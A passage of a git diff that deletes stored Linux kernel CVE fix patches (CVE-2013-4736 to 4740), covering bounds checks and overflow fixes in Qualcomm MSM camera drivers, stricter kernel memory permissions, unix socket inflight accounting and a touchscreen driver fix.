-+++ b/include/net/af_unix.h
-@@ -6,8 +6,8 @@
- #include <linux/mutex.h>
- #include <net/sock.h>
- 
--void unix_inflight(struct file *fp);
--void unix_notinflight(struct file *fp);
-+void unix_inflight(struct user_struct *user, struct file *fp);
-+void unix_notinflight(struct user_struct *user, struct file *fp);
- void unix_gc(void);
- void wait_for_unix_gc(void);
- struct sock *unix_get_socket(struct file *filp);
-diff --git a/include/net/scm.h b/include/net/scm.h
-index 262532d..59fa93c 100644
---- a/include/net/scm.h
-+++ b/include/net/scm.h
-@@ -21,6 +21,7 @@ struct scm_creds {
- struct scm_fp_list {
- 	short			count;
- 	short			max;
-+	struct user_struct	*user;
- 	struct file		*fp[SCM_MAX_FD];
- };
- 
-diff --git a/net/core/scm.c b/net/core/scm.c
-index 14596fb..2696aef 100644
---- a/net/core/scm.c
-+++ b/net/core/scm.c
-@@ -87,6 +87,7 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- 		*fplp = fpl;
- 		fpl->count = 0;
- 		fpl->max = SCM_MAX_FD;
-+		fpl->user = NULL;
- 	}
- 	fpp = &fpl->fp[fpl->count];
- 
-@@ -107,6 +108,10 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
- 		*fpp++ = file;
- 		fpl->count++;
- 	}
-+
-+	if (!fpl->user)
-+		fpl->user = get_uid(current_user());
-+
- 	return num;
- }
- 
-@@ -119,6 +124,7 @@ void __scm_destroy(struct scm_cookie *scm)
- 		scm->fp = NULL;
- 		for (i=fpl->count-1; i>=0; i--)
- 			fput(fpl->fp[i]);
-+		free_uid(fpl->user);
- 		kfree(fpl);
- 	}
- }
-@@ -336,6 +342,7 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
- 		for (i = 0; i < fpl->count; i++)
- 			get_file(fpl->fp[i]);
- 		new_fpl->max = new_fpl->count;
-+		new_fpl->user = get_uid(fpl->user);
- 	}
- 	return new_fpl;
- }
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 49d5093..29be035 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -1496,7 +1496,7 @@ static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 	UNIXCB(skb).fp = NULL;
- 
- 	for (i = scm->fp->count-1; i >= 0; i--)
--		unix_notinflight(scm->fp->fp[i]);
-+		unix_notinflight(scm->fp->user, scm->fp->fp[i]);
- }
- 
- static void unix_destruct_scm(struct sk_buff *skb)
-@@ -1561,7 +1561,7 @@ static int unix_attach_fds(struct scm_cookie *scm, struct sk_buff *skb)
- 		return -ENOMEM;
- 
- 	for (i = scm->fp->count - 1; i >= 0; i--)
--		unix_inflight(scm->fp->fp[i]);
-+		unix_inflight(scm->fp->user, scm->fp->fp[i]);
- 	return max_level;
- }
- 
-diff --git a/net/unix/garbage.c b/net/unix/garbage.c
-index 8fcdc22..6a0d485 100644
---- a/net/unix/garbage.c
-+++ b/net/unix/garbage.c
-@@ -116,7 +116,7 @@ struct sock *unix_get_socket(struct file *filp)
-  * descriptor if it is for an AF_UNIX socket.
-  */
- 
--void unix_inflight(struct file *fp)
-+void unix_inflight(struct user_struct *user, struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
- 
-@@ -133,11 +133,11 @@ void unix_inflight(struct file *fp)
- 		}
- 		unix_tot_inflight++;
- 	}
--	fp->f_cred->user->unix_inflight++;
-+	user->unix_inflight++;
- 	spin_unlock(&unix_gc_lock);
- }
- 
--void unix_notinflight(struct file *fp)
-+void unix_notinflight(struct user_struct *user, struct file *fp)
- {
- 	struct sock *s = unix_get_socket(fp);
- 
-@@ -152,7 +152,7 @@ void unix_notinflight(struct file *fp)
- 			list_del_init(&u->link);
- 		unix_tot_inflight--;
- 	}
--	fp->f_cred->user->unix_inflight--;
-+	user->unix_inflight--;
- 	spin_unlock(&unix_gc_lock);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-4736/ANY/0002.patch
deleted file mode 100644
index f89cffbd..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0002.patch
+++ /dev/null
@@ -1,125 +0,0 @@
-From 8c5300aec8cd9882b89e9d169680221541da0d7f Mon Sep 17 00:00:00 2001
-From: Monika Alekhya <malekh@codeaurora.org>
-Date: Fri, 28 Jun 2013 18:23:40 +0530
-Subject:  msm:camera: Fix overflow issue in ioctl_hw_cmds function
-
-    'len' is of type signed int 32bit,but the assigned value
-    may exceed maximum unsigned int32 range.Add overflow check
-    and graceful exit if 'm'exceeds UINT32_MAX value.
-
-Change-Id: I38f0d10a0cb44d08d0054f91044fc891c246ebd1
-CRs-Fixed: 493314
-Signed-off-by: Monika Alekhya <malekh@codeaurora.org>
----
- drivers/media/video/msm/gemini/msm_gemini_sync.c   |  9 ++++++++-
- drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c    | 10 ++++++++--
- drivers/media/video/msm/mercury/msm_mercury_sync.c | 10 ++++++++--
- 3 files changed, 24 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/video/msm/gemini/msm_gemini_sync.c b/drivers/media/video/msm/gemini/msm_gemini_sync.c
-index ef727fd..f5089ae 100644
---- a/drivers/media/video/msm/gemini/msm_gemini_sync.c
-+++ b/drivers/media/video/msm/gemini/msm_gemini_sync.c
-@@ -23,6 +23,7 @@
- #include <mach/msm_bus.h>
- #include <mach/msm_bus_board.h>
- 
-+#  define UINT32_MAX    (4294967295U)
- static int release_buf;
- 
- /* size is based on 4k page size */
-@@ -804,7 +805,7 @@ int msm_gemini_ioctl_hw_cmds(struct msm_gemini_device *pgmn_dev,
- 	void * __user arg)
- {
- 	int is_copy_to_user;
--	int len;
-+	uint32_t len;
- 	uint32_t m;
- 	struct msm_gemini_hw_cmds *hw_cmds_p;
- 	struct msm_gemini_hw_cmd *hw_cmd_p;
-@@ -813,6 +814,12 @@ int msm_gemini_ioctl_hw_cmds(struct msm_gemini_device *pgmn_dev,
- 		GMN_PR_ERR("%s:%d] failed\n", __func__, __LINE__);
- 		return -EFAULT;
- 	}
-+	if ((m == 0) || (m > ((UINT32_MAX-sizeof(struct msm_gemini_hw_cmds))/
-+		sizeof(struct msm_gemini_hw_cmd)))) {
-+		GMN_PR_ERR("%s:%d] outof range of hwcmds\n",
-+			 __func__, __LINE__);
-+		return -EINVAL;
-+	}
- 
- 	len = sizeof(struct msm_gemini_hw_cmds) +
- 		sizeof(struct msm_gemini_hw_cmd) * (m - 1);
-diff --git a/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c b/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c
-index 6ac4a5e..4a81fa6 100644
---- a/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c
-+++ b/drivers/media/video/msm/jpeg_10/msm_jpeg_sync.c
-@@ -22,6 +22,7 @@
- #include "msm_jpeg_platform.h"
- #include "msm_jpeg_common.h"
- 
-+#define UINT32_MAX    (4294967295U)
- static int release_buf;
- 
- inline void msm_jpeg_q_init(char const *name, struct msm_jpeg_q *q_p)
-@@ -631,7 +632,7 @@ int msm_jpeg_ioctl_hw_cmds(struct msm_jpeg_device *pgmn_dev,
- 	void * __user arg)
- {
- 	int is_copy_to_user;
--	int len;
-+	uint32_t len;
- 	uint32_t m;
- 	struct msm_jpeg_hw_cmds *hw_cmds_p;
- 	struct msm_jpeg_hw_cmd *hw_cmd_p;
-@@ -640,7 +641,12 @@ int msm_jpeg_ioctl_hw_cmds(struct msm_jpeg_device *pgmn_dev,
- 		JPEG_PR_ERR("%s:%d] failed\n", __func__, __LINE__);
- 		return -EFAULT;
- 	}
--
-+	if ((m == 0) || (m > ((UINT32_MAX-sizeof(struct msm_jpeg_hw_cmds))/
-+		sizeof(struct msm_jpeg_hw_cmd)))) {
-+		JPEG_PR_ERR("%s:%d] outof range of hwcmds\n",
-+			__func__, __LINE__);
-+		return -EINVAL;
-+	}
- 	len = sizeof(struct msm_jpeg_hw_cmds) +
- 		sizeof(struct msm_jpeg_hw_cmd) * (m - 1);
- 	hw_cmds_p = kmalloc(len, GFP_KERNEL);
-diff --git a/drivers/media/video/msm/mercury/msm_mercury_sync.c b/drivers/media/video/msm/mercury/msm_mercury_sync.c
-index 9293aad..fe74a0a 100644
---- a/drivers/media/video/msm/mercury/msm_mercury_sync.c
-+++ b/drivers/media/video/msm/mercury/msm_mercury_sync.c
-@@ -24,6 +24,7 @@
- #include "msm_mercury_macros.h"
- #include "msm_mercury_hw_reg.h"
- 
-+#define UINT32_MAX    (4294967295U)
- static struct msm_mercury_core_buf out_buf_local;
- static struct msm_mercury_core_buf in_buf_local;
- 
-@@ -470,7 +471,7 @@ int msm_mercury_ioctl_hw_cmds(struct msm_mercury_device *pmercury_dev,
- 	void * __user arg)
- {
- 	int is_copy_to_user;
--	int len;
-+	uint32_t len;
- 	uint32_t m;
- 	struct msm_mercury_hw_cmds *hw_cmds_p;
- 	struct msm_mercury_hw_cmd *hw_cmd_p;
-@@ -479,7 +480,12 @@ int msm_mercury_ioctl_hw_cmds(struct msm_mercury_device *pmercury_dev,
- 		MCR_PR_ERR("%s:%d] failed\n", __func__, __LINE__);
- 		return -EFAULT;
- 	}
--
-+	if ((m == 0) || (m > ((UINT32_MAX-sizeof(struct msm_mercury_hw_cmds))/
-+		sizeof(struct msm_mercury_hw_cmd)))) {
-+		MCR_PR_ERR("%s:%d] outof range of hwcmds\n",
-+			__func__, __LINE__);
-+		return -EINVAL;
-+	}
- 	len = sizeof(struct msm_mercury_hw_cmds) +
- 		sizeof(struct msm_mercury_hw_cmd) * (m - 1);
- 	hw_cmds_p = kmalloc(len, GFP_KERNEL);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2013-4736/ANY/0003.patch
deleted file mode 100644
index 362d13b0..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4736/ANY/0003.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 81947189009afcfac17d1106101260c660421265 Mon Sep 17 00:00:00 2001
-From: Monika Alekhya <malekh@codeaurora.org>
-Date: Tue, 11 Jun 2013 19:32:27 +0530
-Subject: msm:camera: Fix signedness issue in hw_exec_cmds
-
-  In hw_exec_cmds()second argument m_cmds should be
-  of type unsigned interger
-
-Change-Id: Idad2eb1a59481f3fe9f90221ff2061e8dae57013
-CRs-Fixed: 493314
-Signed-off-by: Monika Alekhya <malekh@codeaurora.org>
----
- drivers/media/video/msm/gemini/msm_gemini_hw.c   | 2 +-
- drivers/media/video/msm/gemini/msm_gemini_hw.h   | 2 +-
- drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c    | 2 +-
- drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h    | 2 +-
- drivers/media/video/msm/mercury/msm_mercury_hw.c | 2 +-
- drivers/media/video/msm/mercury/msm_mercury_hw.h | 2 +-
- 6 files changed, 6 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/video/msm/gemini/msm_gemini_hw.c b/drivers/media/video/msm/gemini/msm_gemini_hw.c
-index 116edcf..99b76be 100644
---- a/drivers/media/video/msm/gemini/msm_gemini_hw.c
-+++ b/drivers/media/video/msm/gemini/msm_gemini_hw.c
-@@ -432,7 +432,7 @@ void msm_gemini_hw_delay(struct msm_gemini_hw_cmd *hw_cmd_p, int m_us)
- 	}
- }
- 
--int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, int m_cmds)
-+int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, uint32_t m_cmds)
- {
- 	int is_copy_to_user = -1;
- 	uint32_t data;
-diff --git a/drivers/media/video/msm/gemini/msm_gemini_hw.h b/drivers/media/video/msm/gemini/msm_gemini_hw.h
-index 0abd4c4..23d31ef 100644
---- a/drivers/media/video/msm/gemini/msm_gemini_hw.h
-+++ b/drivers/media/video/msm/gemini/msm_gemini_hw.h
-@@ -94,7 +94,7 @@ uint32_t msm_gemini_hw_read(struct msm_gemini_hw_cmd *hw_cmd_p);
- void msm_gemini_hw_write(struct msm_gemini_hw_cmd *hw_cmd_p);
- int msm_gemini_hw_wait(struct msm_gemini_hw_cmd *hw_cmd_p, int m_us);
- void msm_gemini_hw_delay(struct msm_gemini_hw_cmd *hw_cmd_p, int m_us);
--int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, int m_cmds);
-+int msm_gemini_hw_exec_cmds(struct msm_gemini_hw_cmd *hw_cmd_p, uint32_t m_cmds);
- void msm_gemini_hw_region_dump(int size);
- void msm_gemini_io_dump(int size);
- 
-diff --git a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c
-index 0bfb6a8..d92caab 100644
---- a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c
-+++ b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.c
-@@ -295,7 +295,7 @@ void msm_jpeg_hw_delay(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_us)
- 	}
- }
- 
--int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_cmds)
-+int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, uint32_t m_cmds)
- {
- 	int is_copy_to_user = -1;
- 	uint32_t data;
-diff --git a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h
-index 73a0e27..5545115 100644
---- a/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h
-+++ b/drivers/media/video/msm/jpeg_10/msm_jpeg_hw.h
-@@ -94,7 +94,7 @@ uint32_t msm_jpeg_hw_read(struct msm_jpeg_hw_cmd *hw_cmd_p);
- void msm_jpeg_hw_write(struct msm_jpeg_hw_cmd *hw_cmd_p);
- int msm_jpeg_hw_wait(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_us);
- void msm_jpeg_hw_delay(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_us);
--int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, int m_cmds);
-+int msm_jpeg_hw_exec_cmds(struct msm_jpeg_hw_cmd *hw_cmd_p, uint32_t m_cmds);
- void msm_jpeg_hw_region_dump(int size);
- void msm_jpeg_io_dump(int size);
- 
-diff --git a/drivers/media/video/msm/mercury/msm_mercury_hw.c b/drivers/media/video/msm/mercury/msm_mercury_hw.c
-index 244c038..a940dd6 100644
---- a/drivers/media/video/msm/mercury/msm_mercury_hw.c
-+++ b/drivers/media/video/msm/mercury/msm_mercury_hw.c
-@@ -263,7 +263,7 @@ void msm_mercury_hw_delay(struct msm_mercury_hw_cmd *hw_cmd_p, int m_us)
- 	}
- }
- 
--int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, int m_cmds)
-+int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, uint32_t m_cmds)
- {
- 	int is_copy_to_user = -1;
- 	uint32_t data;
-diff --git a/drivers/media/video/msm/mercury/msm_mercury_hw.h b/drivers/media/video/msm/mercury/msm_mercury_hw.h
-index 54fc818..f69d8ba 100644
---- a/drivers/media/video/msm/mercury/msm_mercury_hw.h
-+++ b/drivers/media/video/msm/mercury/msm_mercury_hw.h
-@@ -55,7 +55,7 @@ uint32_t msm_mercury_hw_read(struct msm_mercury_hw_cmd *hw_cmd_p);
- void msm_mercury_hw_write(struct msm_mercury_hw_cmd *hw_cmd_p);
- int msm_mercury_hw_wait(struct msm_mercury_hw_cmd *hw_cmd_p, int m_us);
- void msm_mercury_hw_delay(struct msm_mercury_hw_cmd *hw_cmd_p, int m_us);
--int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, int m_cmds);
-+int msm_mercury_hw_exec_cmds(struct msm_mercury_hw_cmd *hw_cmd_p, uint32_t m_cmds);
- void msm_mercury_hw_region_dump(int size);
- 
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4737/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4737/ANY/0001.patch
deleted file mode 100644
index 4b680b63..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4737/ANY/0001.patch
+++ /dev/null
@@ -1,150 +0,0 @@
-From 4256415b296348ff16cd17a5b8f8dce4dea37328 Mon Sep 17 00:00:00 2001
-From: Larry Bassel <lbassel@codeaurora.org>
-Date: Mon, 29 Jul 2013 13:43:17 -0700
-Subject: msm: Make CONFIG_STRICT_MEMORY_RWX even stricter
-
-If CONFIG_STRICT_MEMORY_RWX was set, the first section (containing
-the kernel page table and the initial code) and the section
-containing the init code were both given RWX permission, which is
-a potential security hole.
-
-Pad the first section after the initial code (which will never
-be executed when the MMU is on) to make the rest of the kernel
-text start in the second section and make the first section RW.
-
-Move some data which had ended up in the "init text"
-section into the "init data" one, as this is RW, not RX.
-Make the "init text" RX.
-
-We will not free the section containing the "init text",
-because if we do, the kernel will allocate memory for RW data there.
-
-Change-Id: I6ca5f4e07342c374246f04a3fee18042fd47c33b
-CRs-fixed: 513919
-Signed-off-by: Larry Bassel <lbassel@codeaurora.org>
----
- arch/arm/kernel/vmlinux.lds.S | 12 +++++++-----
- arch/arm/mm/init.c            |  9 +++++++++
- arch/arm/mm/mmu.c             | 15 +++++++--------
- 3 files changed, 23 insertions(+), 13 deletions(-)
-
-diff --git a/arch/arm/kernel/vmlinux.lds.S b/arch/arm/kernel/vmlinux.lds.S
-index ae59e5a..0bf55ae 100644
---- a/arch/arm/kernel/vmlinux.lds.S
-+++ b/arch/arm/kernel/vmlinux.lds.S
-@@ -93,6 +93,9 @@ SECTIONS
- 		_text = .;
- 		HEAD_TEXT
- 	}
-+#ifdef CONFIG_STRICT_MEMORY_RWX
-+	. = ALIGN(1<<SECTION_SHIFT);
-+#endif
- 
- 	.text : {			/* Real text segment		*/
- 		_stext = .;		/* Text and read-only data	*/
-@@ -115,10 +118,10 @@ SECTIONS
- 		*(.got)			/* Global offset table		*/
- 			ARM_CPU_KEEP(PROC_INFO)
- 	}
-+
- #ifdef CONFIG_STRICT_MEMORY_RWX
- 	. = ALIGN(1<<SECTION_SHIFT);
- #endif
--
- 	RO_DATA(PAGE_SIZE)
- 
- #ifdef CONFIG_ARM_UNWIND
-@@ -156,6 +159,9 @@ SECTIONS
- 	.init.proc.info : {
- 		ARM_CPU_DISCARD(PROC_INFO)
- 	}
-+#ifdef CONFIG_STRICT_MEMORY_RWX
-+	. = ALIGN(1<<SECTION_SHIFT);
-+#endif
- 	.init.arch.info : {
- 		__arch_info_begin = .;
- 		*(.arch.info.init)
-@@ -190,10 +196,6 @@ SECTIONS
- 		INIT_RAM_FS
- 	}
- #ifndef CONFIG_XIP_KERNEL
--#ifdef CONFIG_STRICT_MEMORY_RWX
--	. = ALIGN(1<<SECTION_SHIFT);
--#endif
--	__init_data = .;
- 	.exit.data : {
- 		ARM_EXIT_KEEP(EXIT_DATA)
- 	}
-diff --git a/arch/arm/mm/init.c b/arch/arm/mm/init.c
-index 34cb153..e82ea2b 100644
---- a/arch/arm/mm/init.c
-+++ b/arch/arm/mm/init.c
-@@ -909,6 +909,14 @@ void free_initmem(void)
- 				    "TCM link");
- #endif
- 
-+#ifdef CONFIG_STRICT_MEMORY_RWX
-+	poison_init_mem((char *)__arch_info_begin,
-+		__init_end - (char *)__arch_info_begin);
-+	reclaimed_initmem = free_area(__phys_to_pfn(__pa(__arch_info_begin)),
-+				    __phys_to_pfn(__pa(__init_end)),
-+				    "init");
-+	totalram_pages += reclaimed_initmem;
-+#else
- 	poison_init_mem(__init_begin, __init_end - __init_begin);
- 	if (!machine_is_integrator() && !machine_is_cintegrator()) {
- 		reclaimed_initmem = free_area(__phys_to_pfn(__pa(__init_begin)),
-@@ -916,6 +924,7 @@ void free_initmem(void)
- 					    "init");
- 		totalram_pages += reclaimed_initmem;
- 	}
-+#endif
- }
- 
- #ifdef CONFIG_BLK_DEV_INITRD
-diff --git a/arch/arm/mm/mmu.c b/arch/arm/mm/mmu.c
-index c2efc34..e5a60a9 100644
---- a/arch/arm/mm/mmu.c
-+++ b/arch/arm/mm/mmu.c
-@@ -1379,8 +1379,6 @@ void mem_text_write_kernel_word(unsigned long *addr, unsigned long word)
- }
- EXPORT_SYMBOL(mem_text_write_kernel_word);
- 
--extern char __init_data[];
--
- static void __init map_lowmem(void)
- {
- 	struct memblock_region *reg;
-@@ -1401,7 +1399,7 @@ static void __init map_lowmem(void)
- #ifdef CONFIG_STRICT_MEMORY_RWX
- 		if (start <= __pa(_text) && __pa(_text) < end) {
- 			map.length = SECTION_SIZE;
--			map.type = MT_MEMORY;
-+			map.type = MT_MEMORY_RW;
- 
- 			create_mapping(&map);
- 
-@@ -1421,14 +1419,15 @@ static void __init map_lowmem(void)
- 
- 			map.pfn = __phys_to_pfn(__pa(__init_begin));
- 			map.virtual = (unsigned long)__init_begin;
--			map.length = __init_data - __init_begin;
--			map.type = MT_MEMORY;
-+			map.length = (char *)__arch_info_begin - __init_begin;
-+			map.type = MT_MEMORY_RX;
- 
- 			create_mapping(&map);
- 
--			map.pfn = __phys_to_pfn(__pa(__init_data));
--			map.virtual = (unsigned long)__init_data;
--			map.length = __phys_to_virt(end) - (unsigned int)__init_data;
-+			map.pfn = __phys_to_pfn(__pa(__arch_info_begin));
-+			map.virtual = (unsigned long)__arch_info_begin;
-+			map.length = __phys_to_virt(end) -
-+				(unsigned long)__arch_info_begin;
- 			map.type = MT_MEMORY_RW;
- 		} else {
- 			map.length = end - start;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4738/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4738/ANY/0001.patch
deleted file mode 100644
index 43670e75..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4738/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From c9c81836ee44db9974007d34cf2aaeb1a51a8d45 Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman <hpurus@codeaurora.org>
-Date: Fri, 9 Aug 2013 11:21:50 -0700
-Subject: msm: camera: Bound check length for Dequeue stream buff info
-
-Bound check the length param from user space given to
-copy_from_user function to avoid any invalid memory access.
-
-Change-Id: I926509a5fffd49cfc0130d182f246fbb9335b60e
-CRs-Fixed: 519124
-Signed-off-by: Hariram Purushothaman <hpurus@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-index d302131..3aaff78 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/vpe/msm_vpe.c
-@@ -1323,6 +1323,11 @@ static long msm_vpe_subdev_ioctl(struct v4l2_subdev *sd,
- 		struct msm_vpe_buff_queue_info_t *buff_queue_info;
- 
- 		VPE_DBG("VIDIOC_MSM_VPE_DEQUEUE_STREAM_BUFF_INFO\n");
-+		if (ioctl_ptr->len != sizeof(uint32_t)) {
-+			pr_err("%s:%d Invalid len\n", __func__, __LINE__);
-+			mutex_unlock(&vpe_dev->mutex);
-+			return -EINVAL;
-+		}
- 
- 		rc = (copy_from_user(&identity,
- 				(void __user *)ioctl_ptr->ioctl_ptr,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4738/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2013-4738/ANY/0002.patch
deleted file mode 100644
index 239a2fce..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4738/ANY/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 28385b9c3054c91dca1aa194ffa750550c50f3ce Mon Sep 17 00:00:00 2001
-From: Seemanta Dutta <seemanta@codeaurora.org>
-Date: Fri, 26 Jul 2013 13:39:05 -0700
-Subject: msm: camera: Add lower and upper bounds check in msm_cpp.c ioctl()
-
-Add a check for upper and lower bounds in msm_cpp_subdev_ioctl() for
-command code VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO.
-
-CRs-fixed: 518731
-Change-Id: I72996e13b7370a3b49f645297c52a118775b2b12
-Signed-off-by: Seemanta Dutta <seemanta@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index 822c0c8..8c8570d 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -1536,6 +1536,10 @@ long msm_cpp_subdev_ioctl(struct v4l2_subdev *sd,
- 		uint32_t identity;
- 		struct msm_cpp_buff_queue_info_t *buff_queue_info;
- 
-+		if ((ioctl_ptr->len == 0) ||
-+		    (ioctl_ptr->len > sizeof(uint32_t)))
-+			return -EINVAL;
-+
- 		rc = (copy_from_user(&identity,
- 				(void __user *)ioctl_ptr->ioctl_ptr,
- 				ioctl_ptr->len) ? -EFAULT : 0);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4739/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4739/ANY/0001.patch
deleted file mode 100644
index 66d65e80..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4739/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 8604847927f952cc8e773b97eca24e1060a570f2 Mon Sep 17 00:00:00 2001
-From: Seemanta Dutta <seemanta@codeaurora.org>
-Date: Thu, 25 Jul 2013 18:01:32 -0700
-Subject: msm: camera: Fix uninitialized memory returned to userspace
-
-Local structures have not been initialized to all zeroes, so fix
-this by setting them to all zeroes to prevent uninitialized memory
-being copied to userspace.
-
-CRs-fixed: 518478
-Change-Id: I6e76355c3f854514def1bd18dcc5c3ef6db38f16
-Signed-off-by: Seemanta Dutta <seemanta@codeaurora.org>
----
- drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c | 3 ++-
- drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c    | 1 +
- 2 files changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c b/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c
-index 9293aad..e6483c1 100644
---- a/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c
-+++ b/drivers/media/platform/msm/camera_v1/mercury/msm_mercury_sync.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2013, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -196,6 +196,7 @@ int msm_mercury_evt_get(struct msm_mercury_device *pmercury_dev,
- 	int rc = 0;
- 
- 	MCR_DBG("(%d)%s() Enter\n", __LINE__, __func__);
-+	memset(&ctrl_cmd, 0, sizeof(ctrl_cmd));
- 	ctrl_cmd.type = (uint32_t)msm_mercury_q_wait(&pmercury_dev->evt_q);
- 
- 	rc = copy_to_user(arg, &ctrl_cmd, sizeof(ctrl_cmd));
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-index aa6f034..debbf03 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_10/msm_jpeg_sync.c
-@@ -221,6 +221,7 @@ int msm_jpeg_evt_get(struct msm_jpeg_device *pgmn_dev,
- 		return -EAGAIN;
- 	}
- 
-+	memset(&ctrl_cmd, 0, sizeof(ctrl_cmd));
- 	ctrl_cmd.type = buf_p->vbuf.type;
- 	kfree(buf_p);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-4740/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2013-4740/ANY/0001.patch
deleted file mode 100644
index 39e3ca4e..00000000
--- a/Patches/Linux_CVEs/CVE-2013-4740/ANY/0001.patch
+++ /dev/null
@@ -1,300 +0,0 @@
-From f53bcf29a6e7a66b3d935b8d562fa00829261f05 Mon Sep 17 00:00:00 2001
-From: Bingzhe Cai <bingzhec@codeaurora.org>
-Date: Tue, 24 Sep 2013 01:42:12 +0800
-Subject: input: touchpanel: fix security issues in GT915 driver
-
-There are multiple buffer overflow and input validation issues
-in Goodix gt915 driver, fix these issues by adding data length
-check and change file system node mode.
-
-CRs-Fixed: 526101
-Change-Id: I5173fc1ca021fd45c939c7c8a4f460651330de5b
-Signed-off-by: Bingzhe Cai <bingzhec@codeaurora.org>
----
- drivers/input/touchscreen/gt9xx/goodix_tool.c | 110 +++++++++++++++++++-------
- 1 file changed, 83 insertions(+), 27 deletions(-)
-
-diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-index bdac3fd..aa8159f 100644
---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c
-+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c
